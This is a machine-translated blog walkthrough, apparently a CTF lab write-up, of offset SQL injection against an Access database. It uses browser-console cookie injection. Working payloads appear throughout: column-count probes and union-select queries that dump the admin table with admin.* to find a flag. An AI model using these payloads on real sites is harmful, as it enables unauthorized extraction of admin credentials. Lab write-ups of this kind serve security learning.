ACCESS-offset injection

Others 2021-01-22 13:29:52 views: null

Offset injection (other databases are also available)

Principle: During SQL injection, you will encounter some problems that cannot query column names. For example, the system's own database has insufficient permissions to access the system's own database. When you guess the table name and cannot guess the field name, we can use offset injection to query the data in that table. table_name. to query, because it is a wildcard, you can query all the data in it, but there is a length limit, if the number of fields is less than the number of data in the table, it cannot be used

first question:

We first try to see if there is a wrong input in the url bar.
Insert picture description hereObviously it does not exist, so we try cookie injection and
Insert picture description herepress F12 to enter the console, delete the GET parameter in the URL bar, and enter the code in the console

document.cookie="id="+escape("171")

Found that it was executed,
so continue to check the number of fields
Insert picture description here document.cookie="id="+escape("171 order by 10")

But when

document.cookie="id="+escape("171 order by 11)

When there is no data, it is determined that there are 10 field names.
Continue to enter the code

document.cookie="id="+escape("171 union select 1,2,3,4,5,6,7,8,9,10 from admin")

Insert picture description hereFind the output points 2, 7, 8, 9 and
we tried to blast the table name to
Insert picture description hereget one of the table names admin,
but we found that the field name could not be obtained one by one, so we changed to other pages to see if there were any
findings with more fields There is a website with 26 fields

document.cookie="id="+escape("105 order by 26")

Insert picture description hereInsert picture description hereEnter code

document.cookie="id="+escape("105 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from admin")

Insert picture description hereDetermine the output points 3, 5, 7
and enter admin.*

document.cookie="id="+escape("105 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,admin.* from admin")


document.cookie="id="+escape("105 union select 1,2,3,4,5,6,7,8,9,10,admin.* from admin")

Insert picture description hereFinally, there are 16 fields.
We find that the output points are 3, 5,
and 7, so we switch admin.* to 3

document.cookie="id="+escape("105 union select 1,2,admin.*,4,5,6,7,8,9,10,11 from admin")

Insert picture description hereHowever, it was found that it can only output the first 7 data, and cannot query the following data. When querying the first 7 data, no flag was found. Check whether there is any hidden output point in the html.
Insert picture description hereSure enough, there is an output point. Let’s check the next few. Field data, whether there is a flag,
we continue to try one by one, and find the flag
Insert picture description hereInsert picture description here

Guess you like

Origin blog.csdn.net/weixin_43264067/article/details/106091146
Recommended
Ranking
ASP.NET Core storage session to get any value
Linux has disk space but shows insufficient inode usage in Linux
Oral English 433 Twenty English Words Every Day
The use of common transforms in Pytorch
It's Graduation Season II again
Introduction to OracleDB 6: Use DB LINK to clone non-CDB into CDB architecture
How the report generator FastReport .Net uses code to create reports
My Live Writer Plugin - insert monkey face
DCM's diagnostic services dispatcher (DSD) a Detailed
Java NullPointerException when using scanner.hasNext();
Daily
More
2024-05-23(35)
2024-05-22(9)
2024-05-21(35)
2024-05-20(5)
2024-05-19(0)
2024-05-18(31)
2024-05-17(6)
2024-05-16(23)
2024-05-15(5)
2024-05-14(9)

Code World

© 2018 codetd.com